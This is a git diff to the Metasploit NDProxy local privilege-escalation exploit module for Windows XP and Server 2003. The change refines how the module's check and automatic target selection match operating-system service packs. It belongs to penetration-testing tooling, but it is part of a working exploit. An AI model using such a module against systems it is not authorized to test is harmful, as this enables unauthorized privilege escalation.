diff --git a/modules/exploits/windows/local/ms_ndproxy.rb b/modules/exploits/windows/local/ms_ndproxy.rb index 0262562888..d34a7d2406 100644 --- a/modules/exploits/windows/local/ms_ndproxy.rb +++ b/modules/exploits/windows/local/ms_ndproxy.rb @@ -287,18 +287,26 @@ class Metasploit3 < Msf::Exploit::Local return Exploit::CheckCode::Detected end - os = sysinfo["OS"] - unless os =~ /windows xp/i or os =~ /[2003|.net server].*service pack 2/i - return Exploit::CheckCode::Safe - end - handle = open_device("\\\\.\\NDProxy") if handle.nil? return Exploit::CheckCode::Safe end session.railgun.kernel32.CloseHandle(handle) - return Exploit::CheckCode::Appears + os = sysinfo["OS"] + case os + when /windows xp.*service pack 3/i + return Exploit::CheckCode::Appears + when /[2003|.net server].*service pack 2/i + return Exploit::CheckCode::Appears + when /windows xp/i + return Exploit::CheckCode::Detected + when /[2003|.net server]/i + return Exploit::CheckCode::Detected + else + return Exploit::CheckCode::Safe + end + end def exploit @@ -316,7 +324,7 @@ class Metasploit3 < Msf::Exploit::Local if target.name =~ /Automatic/ print_status("Detecting the target system...") os = sysinfo["OS"] - if os =~ /windows xp/i + if os =~ /windows xp.*service pack 3/i my_target = targets[1] print_status("Running against #{my_target.name}") elsif ((os =~ /2003/) and (os =~ /service pack 2/i))